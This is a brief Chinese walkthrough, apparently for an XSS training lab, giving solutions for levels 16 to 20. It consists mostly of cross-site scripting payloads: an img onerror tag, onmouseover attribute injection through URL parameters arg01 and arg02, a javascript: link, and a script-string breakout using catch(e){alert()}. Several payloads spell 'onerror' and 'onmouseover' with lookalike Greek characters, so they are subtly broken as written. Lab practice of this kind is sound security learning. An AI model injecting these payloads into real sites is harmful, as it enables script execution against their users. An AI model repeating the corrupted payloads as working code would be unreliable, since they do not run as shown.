十六.
1.进入关卡按f12

2.把下面语句插入里面
<img src=1 οnerrοr=alert('xss')>

十七.
1.查看一下网络源码

2.传入的两个参数arg01和arg02,出现在了嵌入的src属性中,那我们再arg02处给这个嵌入的标签注册一个事件弹窗即可。
?arg01=a&arg02=%27%20οnmοuseοver=alert("aini")

十八.
1.?arg01=a&arg02=b%20οnmοuseοver=alert(1)

十九
1.
页面输入php?arg01=version&arg02=<a href="javascript:alert(/xss/)">xss</a>,点击xss

二十.
1.php?arg01=id&arg02=xss\"))}catch(e){alert(/xss/)}//%26width=123%26height=123

